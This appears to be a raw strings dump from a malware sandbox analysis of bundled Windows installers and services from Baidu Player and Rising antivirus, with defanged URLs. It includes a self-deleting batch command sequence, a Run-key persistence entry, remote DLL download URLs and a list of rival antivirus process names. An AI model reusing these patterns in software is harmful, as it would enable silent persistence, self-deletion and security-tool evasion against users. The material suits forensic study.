%s : -------------------------------------------------- first buffering time=%d, DLed=%I64i
%s : ****************************************************** buffering time=%d
%s : ****************************************************** buffering time=%d
%s : read at %I64u(%I64u), return %i, available=%I64i, 0xx,0xx,0xx,0xx, index=%u,%I64i
%s : read at %I64u(%I64u), return %i, available=%I64i, 0xx,0xx,0xx,0xx, index=%u,%I64i
%s : peer %s read callback at %I64u,%I64i,%I64i(%i), not ready
%s : peer %s read callback at %I64u,%I64i,%I64i(%i), not ready
%s : peer %s read callback at %I64u(%i), ready
%s : peer %s read callback at %I64u(%i), ready
%s : DUP, uid=%I64i, pid=%d, kid=%I64i, total=%I64i
%s : DUP, uid=%I64i, pid=%d, kid=%I64i, total=%I64i
%s : DATA uid=%I64i, pid=%d, kid=%I64i, length=%I64i, avail=%I64i
%s : DATA uid=%I64i, pid=%d, kid=%I64i, length=%I64i, avail=%I64i
add reserve state : peer id=%I64i, blockid=%d
add reserve state : peer id=%I64i, blockid=%d
REQ uid=%I64i, pid=%d, kid=%d
REQ uid=%I64i, pid=%d, kid=%d
%s : delete task, index=%u
%s : delete task, index=%u
%s : start p2s, index=%u
%s : start p2s, index=%u
%s : stop p2s, index=%u
%s : stop p2s, index=%u
%s : delete p2p task
%s : delete p2p task
%s : create share memory fail, error=%d
%s : create share memory fail, error=%d
%s : start task, index=%u
%s : start task, index=%u
%s : find resume file
%s : find resume file
%s : load resume file success
%s : load resume file success
%s : file removed
%s : file removed
%s : p2s finish code = %d
%s : p2s finish code = %d
%s : filesize = %I64d, full hash length=%d
%s : filesize = %I64d, full hash length=%d
%s : no p2p fid, choose P2S
%s : no p2p fid, choose P2S
%s : no hash array
%s : no hash array
%s : send full hash done
%s : send full hash done
%s : check url done, code=%d
%s : check url done, code=%d
%s : forbidden
%s : forbidden
%s : network error
%s : network error
%s : stop task, index=%u
%s : stop task, index=%u
%s : AddEmergencyRange(%I64i,%I64i) %I64i
%s : AddEmergencyRange(%I64i,%I64i) %I64i
%s : SetPriorityWindow(%I64i,%I64i)
%s : SetPriorityWindow(%I64i,%I64i)
%s : disk full
%s : disk full
%s : create file error, error=%d
%s : create file error, error=%d
%s : rename fail
%s : rename fail
%s : rename success
%s : rename success
%s : add p2p share
%s : add p2p share
%s : task complete
%s : task complete
%s : no hash array, need report to server
%s : no hash array, need report to server
%s : zero hash at %i, rehash
%s : zero hash at %i, rehash
%s : total verify success, report and add share
%s : total verify success, report and add share
%s : total verify fail
%s : total verify fail
%s : complete download ,but not complete verify, recheck
%s : complete download ,but not complete verify, recheck
%s : send finish info, range count=%d,verified range=%I64i, total=%I64i
%s : send finish info, range count=%d,verified range=%I64i, total=%I64i
%s : create disk file fail
%s : create disk file fail
%s : try write hash piece failed: %I64i - %I64i
%s : try write hash piece failed: %I64i - %I64i
%s : memory verify success: %I64i(%I64i)
%s : memory verify success: %I64i(%I64i)
%s : memory verify fail: %I64i(%I64i)
%s : memory verify fail: %I64i(%I64i)
%s : write piece success: %I64i - %I64i
%s : write piece success: %I64i - %I64i
%s : write piece fail: %I64i - %I64i
%s : write piece fail: %I64i - %I64i
%s : disk verify success at %I64i(%i)
%s : disk verify success at %I64i(%i)
%s : disk verify fail at %I64i(%i)
%s : disk verify fail at %I64i(%i)
%s : GetTaskInfo
%s : GetTaskInfo
%s : peers_add=%d, peers_total=%d, seeders=%d, downloaders=%d
%s : peers_add=%d, peers_total=%d, seeders=%d, downloaders=%d
%s : GetInternalState
%s : GetInternalState
%s : GetTaskStatistics
%s : GetTaskStatistics
%s : GetBlockInfo
%s : GetBlockInfo
%d total,%I64i(%I64i), %d%%
%d total,%I64i(%I64i), %d%%
%s : set task state, state=%d, error=%d
%s : set task state, state=%d, error=%d
%s : set file size = %I64i
%s : set file size = %I64i
%s : load verify range at %I64i(%i)
%s : load verify range at %I64i(%i)
%s : load data at %I64i(%i)
%s : load data at %I64i(%i)
%s : on finish range,peer %I64i
%s : on finish range,peer %I64i
%s : alloc %I64i-%I64i,peer %I64i
%s : alloc %I64i-%I64i,peer %I64i
%s : p2s peer %I64i connected
%s : p2s peer %I64i connected
%s : p2s peer %I64i leave
%s : p2s peer %I64i leave
%s : p2s peer %I64i ready to request : %I64i-%I64i
%s : p2s peer %I64i ready to request : %I64i-%I64i
%s : peer %I64i leave
%s : peer %I64i leave
recv calc verify response, block id=%d, from %I64i
recv calc verify response, block id=%d, from %I64i
crc at %I64i wrong piece %d, find bad boy
crc at %I64i wrong piece %d, find bad boy
%s : may upload bad data, peer id=%I64i
%s : may upload bad data, peer id=%I64i
%s : create p2p task fail, already exists
%s : create p2p task fail, already exists
make a decision, for speed = %dKB/s > 150KB/s
make a decision, for speed = %dKB/s > 150KB/s
make a decision, for elapse 10 seconds, speed = %dKB/s
make a decision, for elapse 10 seconds, speed = %dKB/s
choose P2S, P2S=%d KB/s, %s
choose P2S, P2S=%d KB/s, %s
choose P2P, P2S=%d KB/s
choose P2P, P2S=%d KB/s
call delete_p2p_task, %u
call delete_p2p_task, %u
dup url, url=%s
dup url, url=%s
new task, url=%s
new task, url=%s
ref=%s
ref=%s
tmp=%s
tmp=%s
the same task id %d
the same task id %d
create task, index=%u
create task, index=%u
StopTaskAsync: %u
StopTaskAsync: %u
StopTaskSync: %u
StopTaskSync: %u
fid=%s, url=%s
fid=%s, url=%s
tasks.dat exist, do not check tasks.ini
tasks.dat exist, do not check tasks.ini
read tasks.ini from %s
read tasks.ini from %s
acctrack.kuaibo.com
acctrack.kuaibo.com
acc.p2sp.baidu.com
acc.p2sp.baidu.com
0.0.0.0
0.0.0.0
dudpxp://
dudpxp://
[DUDPXP]
[DUDPXP]
index.html
index.html
%%%2X
%%%2X
hXXp://
hXXp://
PTF://
PTF://
%s:%s@
%s:%s@
%s%s%s%s%s
%s%s%s%s%s
hXXp:///
hXXp:///
hXXp://%s:%d/%s
hXXp://%s:%d/%s
cmp2s.p2sp.baidu.com
cmp2s.p2sp.baidu.com
query?cmd=url2finfo
query?cmd=url2finfo
query?cmd=fid2finfo
query?cmd=fid2finfo
query?cmd=validurl
query?cmd=validurl
commit?cmd=finfo
commit?cmd=finfo
P2SCfg.ini
P2SCfg.ini
Port
Port
%s %s HTTP/1.1
%s %s HTTP/1.1
Content-Length: %d
Content-Length: %d
d:\cygwin\home\scmpf\compiler_src\panfeng02_563106_win32\0\app\gensoft\p2p\client\platform\objs\BaiduP2PService.pdb
d:\cygwin\home\scmpf\compiler_src\panfeng02_563106_win32\0\app\gensoft\p2p\client\platform\objs\BaiduP2PService.pdb
P2PBase.dll
P2PBase.dll
?StatAdd@CP2PStatReport@@QAEX_K0@Z
?StatAdd@CP2PStatReport@@QAEX_K0@Z
?StatAdd@CP2PStatReport@@QAEX_KQAE@Z
?StatAdd@CP2PStatReport@@QAEX_KQAE@Z
?StatAdd@CP2PStatReport@@QAEX_KPAEI@Z
?StatAdd@CP2PStatReport@@QAEX_KPAEI@Z
?SendReport@CP2PStatReport@@QAEHXZ
?SendReport@CP2PStatReport@@QAEHXZ
??1CP2PStatReport@@QAE@XZ
??1CP2PStatReport@@QAE@XZ
??0CP2PStatReport@@QAE@PBD000@Z
??0CP2PStatReport@@QAE@PBD000@Z
P2PStatReport.dll
P2PStatReport.dll
P2SBase.dll
P2SBase.dll
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
RegisterHotKey
RegisterHotKey
UnregisterHotKey
UnregisterHotKey
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
RegCreateKeyExW
RegCreateKeyExW
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteW
ShellExecuteW
SHELL32.dll
SHELL32.dll
OLEAUT32.dll
OLEAUT32.dll
SHLWAPI.dll
SHLWAPI.dll
WS2_32.dll
WS2_32.dll
iphlpapi.dll
iphlpapi.dll
CryptMsgClose
CryptMsgClose
CertGetNameStringW
CertGetNameStringW
CertFreeCertificateContext
CertFreeCertificateContext
CertFindCertificateInStore
CertFindCertificateInStore
CertCloseStore
CertCloseStore
CryptMsgGetParam
CryptMsgGetParam
CRYPT32.dll
CRYPT32.dll
WINTRUST.dll
WINTRUST.dll
VERSION.dll
VERSION.dll
GetConsoleOutputCP
GetConsoleOutputCP
GetCPInfo
GetCPInfo
.?AV?$FieldVector@VURL@p2s@@@serial@@
.?AV?$FieldVector@VURL@p2s@@@serial@@
.?AVP2SValidUrl@p2s@@
.?AVP2SValidUrl@p2s@@
zcÁ
zcÁ
g\Xbdyy.dll
g\Xbdyy.dll
\bdupdate.exe
\bdupdate.exe
\autoupdate.ini
\autoupdate.ini
\banner.jpg
\banner.jpg
\Baidu\BaiduPlayer\bdupdate.exe
\Baidu\BaiduPlayer\bdupdate.exe
\Baidu\BaiduPlayer\autoupdate.ini
\Baidu\BaiduPlayer\autoupdate.ini
\Baidu\BaiduPlayer\banner.jpg
\Baidu\BaiduPlayer\banner.jpg
\BaiduPlayer.exe
\BaiduPlayer.exe
&Version=%d.%d.%d.%d
&Version=%d.%d.%d.%d
&LangID=%d
&LangID=%d
!\Cabinet.dll
!\Cabinet.dll
@.exe
@.exe
\bugreport.exe
\bugreport.exe
bdbugreport_%u
bdbugreport_%u
CPU : Arch=%d, Type=%d, Level=%d, Rev=%d, No.=%d
CPU : Arch=%d, Type=%d, Level=%d, Rev=%d, No.=%d
MemoryPool : Total=%d, Free=%d
MemoryPool : Total=%d, Free=%d
User : Lang=%d,LCID=%d ; System : Lang=%d,LCID=%d
User : Lang=%d,LCID=%d ; System : Lang=%d,LCID=%d
Memory Corruption : %s
Memory Corruption : %s
"%s" --smname=%s
"%s" --smname=%s
CryptQueryObject failed with %x
CryptQueryObject failed with %x
CryptMsgGetParam failed with %x
CryptMsgGetParam failed with %x
Program Name : %s
Program Name : %s
Publisher Link : %s
Publisher Link : %s
MoreInfo Link : %s
MoreInfo Link : %s
CertFindCertificateInStore failed with %x
CertFindCertificateInStore failed with %x
Signer Certificate:
Signer Certificate:
TimeStamp Certificate:
TimeStamp Certificate:
Date of TimeStamp : d/d/d d:d
Date of TimeStamp : d/d/d d:d
CertGetNameString failed.
CertGetNameString failed.
Issuer Name: %s
Issuer Name: %s
Subject Name: %s
Subject Name: %s
CryptDecodeObject failed with %x
CryptDecodeObject failed with %x
The file "%s" is signed and the signature was verified.
The file "%s" is signed and the signature was verified.
The file "%s" is not signed.
The file "%s" is not signed.
An unknown error occurred trying to verify the signature of the "%s" file.
An unknown error occurred trying to verify the signature of the "%s" file.
Error is: 0x%x.
Error is: 0x%x.
\platform_%d.log
\platform_%d.log
\platform.log
\platform.log
\platform_crush_%d.log
\platform_crush_%d.log
\platform_quit_%d.log
\platform_quit_%d.log
%sV%u
%sV%u
\running.pid
\running.pid
SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}
SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}
BaiduP2PService.exe
BaiduP2PService.exe
FTP://
FTP://
HTTP://
HTTP://
\qqwry.dat
\qqwry.dat
.bdre
.bdre
.bdtp
.bdtp
\Baidu\BaiduPlayer\Service.ini
\Baidu\BaiduPlayer\Service.ini
f182cd1a-751e-4a90-9153-cbf3eb0e2040-zxcBDNet
f182cd1a-751e-4a90-9153-cbf3eb0e2040-zxcBDNet
Global\f182cd1a-751e-4a90-9153-cbf3eb0e2040-mnbvcxzBDExit
Global\f182cd1a-751e-4a90-9153-cbf3eb0e2040-mnbvcxzBDExit
f182cd1a-751e-4a90-9153-cbf3eb0e2040-zxcBDNetMutex
f182cd1a-751e-4a90-9153-cbf3eb0e2040-zxcBDNetMutex
F=>%p, S=>%d
F=>%p, S=>%d
d\P2PBase.dll
d\P2PBase.dll
\P2SBase.dll
\P2SBase.dll
\P2PStatReport.dll
\P2PStatReport.dll
\StatReport.exe
\StatReport.exe
Global\0531f939-e126-410c-8e44-dc1c0b375a79_%u
Global\0531f939-e126-410c-8e44-dc1c0b375a79_%u
BufferPercent=%d
BufferPercent=%d
State=,Error=,Peers==/=/=(=), Speed=d,DLed=I64i(%6.2f%%),S=I64i,Dup=%I64i(%6.2f%%),R=I64i,DV/MV/DE/ME=%d/%d/%d/%d,EM=%I64i,H=%u
State=,Error=,Peers==/=/=(=), Speed=d,DLed=I64i(%6.2f%%),S=I64i,Dup=%I64i(%6.2f%%),R=I64i,DV/MV/DE/ME=%d/%d/%d/%d,EM=%I64i,H=%u
State=,Error=,Peers==/=/=(=), Speed=d,DLed=I64i(00%%),S=I64i,Dup=%I64i(0.00%%),R=I64i,H=%u
State=,Error=,Peers==/=/=(=), Speed=d,DLed=I64i(00%%),S=I64i,Dup=%I64i(0.00%%),R=I64i,H=%u
Q=%d, FH=%d,P=%d, B=%d,P2P=%u,SCnt=%u,QDat=%dKB,QSta=%d,QSpe=%d,FID=%s Name=%s
Q=%d, FH=%d,P=%d, B=%d,P2P=%u,SCnt=%u,QDat=%dKB,QSta=%d,QSpe=%d,FID=%s Name=%s
Pending== Partial==/=, F=}/}/}, DT=%d, RC=%d,DA=%d, WP=%I64i,WD=%I64i
Pending== Partial==/=, F=}/}/}, DT=%d, RC=%d,DA=%d, WP=%I64i,WD=%I64i
%6I64iK,%6I64iK,%s,AReq/ARes=%6u/%6u,RP=%d,LP=%d,RTT/RTO=M/M,W==,Q==,P==,LAN=%d,C=%d,R=-,NAT=-,V=MKB/s
%6I64iK,%6I64iK,%s,AReq/ARes=%6u/%6u,RP=%d,LP=%d,RTT/RTO=M/M,W==,Q==,P==,LAN=%d,C=%d,R=-,NAT=-,V=MKB/s
WAdd=%u.%u.%u.%u:%u(%s)
WAdd=%u.%u.%u.%u:%u(%s)
LAddr=%u.%u.%u.%u:%u
LAddr=%u.%u.%u.%u:%u
EAddr=%u.%u.%u.%u:%u
EAddr=%u.%u.%u.%u:%u
Ver=%u.%u.%u.%u
Ver=%u.%u.%u.%u
Reserve=%d
Reserve=%d
UID=%I64i,Sta=%d,StaNext=%d,Retry=%d,MP=]/] KB,D=M/M KB/s,U=M/M KB/s,%s
UID=%I64i,Sta=%d,StaNext=%d,Retry=%d,MP=]/] KB,D=M/M KB/s,U=M/M KB/s,%s
Self:%s(%d),P2P:%s(%d),P2S:%s(%d),Stat:%s(%d),Tcps=-,Port=%u,Err=%u,Up=%d,Alloc==,Wr=M,Bitmap=-,WC==,AC==,RQ=-
Self:%s(%d),P2P:%s(%d),P2S:%s(%d),Stat:%s(%d),Tcps=-,Port=%u,Err=%u,Up=%d,Alloc==,Wr=M,Bitmap=-,WC==,AC==,RQ=-
\Baidu\BaiduPlayer\tasks.dat
\Baidu\BaiduPlayer\tasks.dat
\Baidu\BaiduPlayer\tasks.ini
\Baidu\BaiduPlayer\tasks.ini
field%d
field%d
\assfile.dll
\assfile.dll
\ManagerStub.dll
\ManagerStub.dll
Test Fail, Error=%d, r2=%d
Test Fail, Error=%d, r2=%d
MyBDHotkey1
MyBDHotkey1
MyBDHotkey
MyBDHotkey
MyBDHotkeyVer
MyBDHotkeyVer
CKernel32.dll
CKernel32.dll
/commonlib.dll
/commonlib.dll
%Program Files%\tools\BaiduP2PService.exe
%Program Files%\tools\BaiduP2PService.exe
"%Program Files%\tools\BaiduP2PService.exe"
"%Program Files%\tools\BaiduP2PService.exe"
Baidu.com, Inc.
Baidu.com, Inc.
1,0,14,43
1,0,14,43
QQPCDownload71960.exe_2776:
MM-liao8863.exe_2808:
install1393485.exe_1148:
install1393485.exe_1148_rwx_00401000_001FC000:
Skip Backing Up File %s For Checked OK...
Copy File Return: %d, NeedReboot: %d
MoveFile From %s To %s
Prepare To Copy File From %s To %s...
TaskbarPin = 0x%x
Install Link: %s
Delete Link: %s
TaskbarunPin = 0x%x
Old Link File: %s
SUBKEY
Set Key %s Everyone Access Rights 0xX return: %d
Set Key %s Users Access Rights 0xX return: %d
REGKEYDATATYPE
Install Key KeyName: %s, ValueName: %s, Value: %s, DataType: %d Return: %d
Backup Key Value Return: %d
microsoft\windows\currentversion\run
Restore Key Value Return: %d
UnInstall Key KeyName: %s, ValueName: %s Return: %d
Execute langsel.exe
langsel.exe
Setup Log (*.log)
*.log
A%d M
%DATADIR%
Need Reboot, Add DeletePath Task To Server: %s
No Reboot, RsDeletePath(%s)
\lics%d.txt
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
{X-X-X-XX-XXXXXX}.bmp
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SHFolder.dll
Shell32.dll
HKEY_LOCAL_MACHINE\%s\%s
%snserver.exe
%sRsTest.ini
Software\Microsoft\Windows\CurrentVersion
nserver.exe
%FIRSTPART%
%COMMONDIR%
%DOMINODATA%
%DOMINODIR%
%SYSDIR64%
%SYSDIR%
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
[INF]CRsConfigBase::InitializeRsConfig: GetPath(PathSize=%d),Result=0xX
[ERR]CRsConfigBase::InitializeRsConfig: QueryInterface RSIID_IRSCfgMgr Failed(Result=0xX)!
[ERR]CRsConfigBase::InitializeRsConfig:CreateAppEnv Failed(Result=0xX).
RsConfig.cfg
[ERR]CRsConfigBase::InitializeRsConfig:QueryInterface RSIID_IRSAppMgr failed(Result=0xX).
[ERR]CRsConfigBase::InitializeRsConfig:CreateObject RSID_RSAppMgr failed(Result=0xX).
RSAPPMGR.DLL
\RSAPPMGR.DLL
comx3.dll
%s>
standalone="%s"
encoding="%s"
version="%s"
X;
%s='%s'
%s="%s"
\RsLang.dll
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
System\CurrentControlSet\Services\VxD\MSTCP
255.255.255.255
socket() failed; %d
Range: bytes=%d-
hXXp://
portuguese-brazilian
.rstmp
1.1.3
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
C:\DistributedAutoLink\Temp\CompileOutputDir\Setup.pdb
GetProcessHeap
SetNamedPipeHandleState
WaitNamedPipeA
GetWindowsDirectoryA
KERNEL32.dll
MsgWaitForMultipleObjects
ExitWindowsEx
EnumWindows
EnumChildWindows
USER32.dll
comdlg32.dll
RegCloseKey
RegOpenKeyExA
RegCreateKeyA
RegOpenKeyA
RegCreateKeyExA
RegDeleteKeyA
RegSetKeySecurity
RegGetKeySecurity
RegQueryInfoKeyA
RegEnumKeyExA
ADVAPI32.dll
ShellExecuteExA
ShellExecuteA
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
RPCRT4.dll
InternetCrackUrlA
HttpQueryInfoA
HttpSendRequestA
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
VERSION.dll
WSOCK32.dll
GetCPInfo
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
6'6.6>6>729#939:9[9; ;$;(;,;0;4;8;/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0DhXXp://ocsp.verisign.com0;/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0)rackUrl3&It is strongly recommended to close all Windows program before running the setup program.Password:This module need %fM1.0.0.2Setup.EXE20140619153336140ECan't create the destination folder, please check and input it again.APlease take off your CD avoiding to restart from CDROM next time.Totally scaned %d files, found %d viruses.Export,Unable to Create File Folder: %s , continue?This version [version:%s] is older than your current installed [version:%s]Continue to install Rising AntiVirus Software[version:%s]?%Click "Next" to continue installationjSystem comctl32.dll version is lower than 4.70!\please upgrade it through installing IE4 or above version.KYou have install follow Rising product, this product can't install whit it.FLast Rising setup progress is not completed, please reboot your systemNRising Anti-virus software has been uninstalled successfully but follow files.!Version: %s Update Date: %s$Add or remove same component please!(%d second left to auto close this dialog8Rising Anti-virus software has been updated successfullyPassword is error7update is completed, windows need reboot for copy file.RsMgrSvc.exe_1936:.text`.rdata@.data.rsrct%ShH;B|$D.tDCryptDecodeObject failed with %xwintrust.dllWTHelperGetProvCertFromChainCryptCATCatalogInfoFromContextcrypt32.dllCryptMsgGetParamCryptSIPVerifyIndirectData failed with %x1.3.6.1.4.1.311.2.1.4CryptMsgGetParam(%d) failed with %xCryptSIPRetrieveSubjectGuid failed with %xCryptQueryObject failed with %x\\.\PhysicalDrive%d\\.\Scsi%d:Iphlpapi.dllSoftware\Microsoft\Windows\CurrentVersionAdvapi32.dll\Rising\RSD\RsMgrSvc.exe"Explorer.exe
XXXXXXXXXXX
{X-X-X-XX-XXXXXX}
CLSID\{CAA2D3B1-4BB5-4a45-A17A-122773379D99}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
[d-d-d][d:d:d:d]
SHFolder.dll
Shell32.dll
SOFTWARE\Rising\%s
2.log
[u]
[0xX]
RAV.INI
WinSessionThread GetPidByName dwPID = %d , name=%s!
NtDll.dll
Kernel32.dll
WTSQueryUserToken Failed! Err Code: %d
wtsapi32.DLL
OpenProcess Failed! Err Code: %d
GetProcAddress(OpenProcessToken) Failed! Err Code: %d
OpenProcessToken Failed! Err Code: %d
GetLogonUserToken(%d)
>`userinit.exe
CRsMgrSvc::WaitForLogonNT:LoadLibrary(_"psapi.dll");err=0x%x
psapi.dll
Fail to OpenProcessToken; 0x%x
Failed to call CreateProcessAsUser again: appname = %s cmd=%s;err=0x%x.
Failed to SetTokenInformation(0):err=0x%x
Failed to call CreateProcessAsUser:cmd=%s;err=0x%x.
Failed to DuplicateTokenEx:err=0x%x
Failed to SetTokenInformation:err=0x%x
SessionId = %d
Failed to LoadLibrary("Wtsapi32.dll"):err=0x
Failed to call WTSEnumerateSessions:err=0x%x
SessionInfo[%d]: SessionId=%d; WinStationName=%s; State=%d.
Wtsapi32.dll
Failed to CreateProcess:%s;err=0x%x
Failed to LoadLibrary("Wtsapi32.dll"):err=0x%x
Failed to WTSEnumerateSessions:err=0x%x
Session\%d\RSD_POP_MESSAGE_INFO
WinSessionThread CreateProcess ret = %d end !
WinSessionThread CreateProcess pid = %d, CreateProcessAsUser err = %d !
Userenv.DLL
WinSessionThread CreateProcess begin dwSessionID = %d!
Failed to LoadLibrary("Userenv.DLL"):err=0x%x
Failed to call CreateProcessAsUser: cmd=%s;err=0x%x.
New Failed to call WTSQueryUserToken, err= 0x%x
rsmsg
%s\rsmsginfo.ini
Failed to open the shell ready event: 0x%x
"%s" /shellrun
%s\RsStub.exe
Session\%d\ShellReadyEvent
LogonRun - session : %d
Failed to call RegOpenKeyEx, err = 0x%x
Failed to call RegSaveKey, err = 0x%x
Failed to call AdjustTokenPrivileges, err = 0x%x
Failed to call OpenPrcessToken, err = 0x%x
%s\RsMgrSvc.dat
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%s
BaiduAnSvc.exe
BaiduSdSvc.exe
liebao.exe
ksafe.exe
{849B7E2B-0551-429C-B317-14B7D374D6EC}_is1
kxescore.exe
QQPCRtp.exe
360sd.exe
360se.exe
{23F3F476-BE34-4f48-9C77-2806A8393EC4}
360Desktop.exe
ZhuDongFangYu.exe
safeboxTray.exe
Failed to Create LogonRunThread Thread, err = 0x%x
SessionChange:EventType=%d; sessionID = %d
\Backup\RSD\RSSetup\RSSetup.xml
rsup10.rising.com.cn
u.suxiazai.com
%s?t=0&info=%s
ver=%s&guid=%s&sguid=%s&state=%s
hXXp://u.suxiazai.com/menu/info.xml
hXXp://rsup10.rising.com.cn/menu/info.xml
%srsd\info.xml
/subkey
Failed to Verify the "%s".
Failed to call vf.Init.
%s\rsbackup.exe
"%s\rsbackup.exe"
/subkey
%s\RsMgrSvc.ini
%s\updater.exe
"%s\updater.exe"
DeleteFile: %s.
ITEM%d
\RsMgrSvc.ini
DeletePath: %s.
Clean WillReboot In %s
%s\%s\%s.ini
1971-01-01 00:00:00
%d-%d-%d %d:%d:%d
%s\Data
%s /subkey %s /RsMgrSvc
"%s\Updater.exe" /silence
%s\Updater.exe
\Reboot.ini
CRsMgrSvc::SVC:Failed to CreateEvent-Wait: err=0x%x
CRsMgrSvc::SVC:Failed to CreateEvent, err=0x%x
comx3.dll
KERNEL32.DLL
kernel32.dll
MSIE %d.%d
WININET.DLL
Windows
Windows Me
Windows 98
Windows 95
Windows NT %d.%d
%s:%d
Mozilla/4.0 (compatible; %s; %s; Rising)
HTTP/1.0
Range: bytes=%d-
RstoreDll.dll
@CRsUseRepairProduct::prstorestart %s Dllpath:%s
@CRsUseRepairProduct::prstorestart %s
Subkey: %s could not find dllPath ,so use rsd path:%s
Subkey: %s Path:%s
\RstoreDll.dll
02%d.d.d.d
CRsLoadCloud::DownLoadCldRsdDll... faild hre = %d ,lasterror = %d
CRsLoadCloud::LoadCldRsdDll... failed lasterror = %d
CRsLoadCloud::LoadCldRsdDll...%s
CRsLoadCloud::StartTask...success
CRsLoadCloud::InitData... CopyFile flag= %d.
hXXp://download.suxiazai.com/for_down/2013/new/dlls/CldRsd.dll
CldRsd.dll
mscoree.dll
internal state. The program cannot safely continue execution and must
continue execution and must now be terminated.
- This application cannot run using the active version of the Microsoft .NET Runtime
Please contact the application's support team for more information.
GetProcessWindowStation
user32.dll
C:\DistributedAutoLink\Temp\CompileOutputDir\RsMgrSvc.pdb
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyExA
RegEnumKeyExA
RegCreateKeyA
RegOpenKeyA
RegSaveKeyA
RegQueryInfoKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
CryptMsgClose
CertCloseStore
CertGetNameStringW
CertFindCertificateInStore
CRYPT32.dll
RPCRT4.dll
InternetCrackUrlA
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
HttpAddRequestHeadersA
WININET.dll
VERSION.dll
GetProcessHeap
GetCPInfo
%Program Files%\Rising\RSD\RsMgrSvc.exe.log
%Program Files%\Rising\RSD\RsMgrSvc.exe
.Beijing Rising Information Technology Corporation Limited
1.0.0.50
RsMgrSvc.exe
20150423153938597
install1393485.exe_1148_rwx_10072000_00001000:
SetWillReboot(%d)
Failed to call QueryServiceStatus(RSD)! Err Code: %d
Failed to call OpenService(RSD)! Err Code: %d
Failed to call OpenSCManager! Err Code: %d
\RsTest.ini
%DESKTOP%
\label.dat
\Backup.ini
\Export.ini
\XMLS\RSSetup.xml
\Setup.exe
\*.exe
\XMLS\Setup.xml
\os.xml
Label.dat
/PASS=
/PRODUCT=%s
/LANG=%d
HKEY_LOCAL_MACHINE\SoftWare\Rising\%s
ITEM%d
UPDATEXMLURL
d-d-- d:d
Setup.dll
Local_RSD_Setup_%s
Global\Rising_RSD_Setup_%s
Rising_RSD_Setup_%s
\Backup\RSD\RSSetup\RSSetup.xml
\RSSetup.xml
\CompsVer.inf
AddPCAExclude return: %d
Open Key Failed!
Create Key Failed!
Query Value Failed! Return: %d
%s\Setup.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags
AddPCAExclude(%d)
Setup.xml
\Setup.xml
12345678.000
Create Temp Cfg From %s to %s
rd /q %s
rd /s /q %s
if exist %s goto repeat
del /s /q /f %s
\DelSelf.bat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SetFileSecurity() failed. Error %d
SetSecurityDescriptorControl() failed.Error %d
GetSecurityDescriptorControl() failed.Error %d
SetSecurityDescriptorDacl() failed. Error %d
AddAce() failed. Error %d
GetAce() failed. Error %d
AddAccessAllowedAce() failed. Error %d
AddAccessAllowedAceEx() failed. Error %d
advapi32.dll
InitializeAcl() failed. Error %d
HeapAlloc() failed. Error %d
GetAclInformation() failed. Error %d
popwndexe.exe_760:
.text
`.rdata
@.data
.rsrc
@.reloc
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
operator
GetProcessWindowStation
USER32.DLL
C:\DistributedAutoLink\Temp\CompileOutputDir\popwndexe.pdb
KERNEL32.dll
ole32.dll
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
mscoree.dll
KERNEL32.DLL
rsdk.dll
{{887FE1BB-7C1F-4d73-BD44-B726E1672DC7}}_%s
%Program Files%\Rising\RSD\popwndexe.exe
1.0.0.7
tray.exe
814210592210000
9158.exe_3012:
.text
`.rdata
@.data
.rsrc
(3-!0,1'8"5.*2$unzip 0.18 Copyright 1998-2002 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll1.1.4inflate 1.1.4 Copyright 1995-2002 Mark AdlerHttpQueryInfoAInternetOpenUrlAWININET.dll?IsControlHaveSkin@CAppSysOperation@@UAEHXZ?CleanBitmapMem@CAppSysOperation@@UAEHXZ?LoadBitmapFileToMem@CAppSysOperation@@UAEHPAUHINSTANCE__@@VCString@@PAVCBitmap@@@Z?LoadBitmapFileToMem@CAppSysOperation@@UAEHPAUHINSTANCE__@@VCString@@@Z?InitializeOperation@CAppSysOperation@@UAEXPAVCWnd@@@Z?CleanSkin@CAppSysOperation@@UAEHPAX@Z?DrawContent@CAppSysOperation@@UAEHPAVCDC@@VCString@@AAVCRect@@H@Z?AdjustPosition@CAppSysOperation@@UAEHHHHH@Z?AdjustPosition@CAppSysOperation@@UAEHUtagRECT@@@Z?DrawSkin@CAppSysOperation@@UAEHPAUtagDRAWITEMSTRUCT@@@Z?PaintBackGround@CAppSysOperation@@UAEHPAVCDC@@@Z?CleanUp@CAppSysOperation@@UAEXXZ?AttachBitmapHadle@CAppSysOperation@@UAEXPAUHBITMAP__@@PAVCBitmap@@@Z?AttachBitmapHadle@CAppSysOperation@@UAEXPAUHBITMAP__@@@Z?PreTranslateMessage@CUIButtonTemplate@@MAEHPAUtagMSG@@@Z?messageM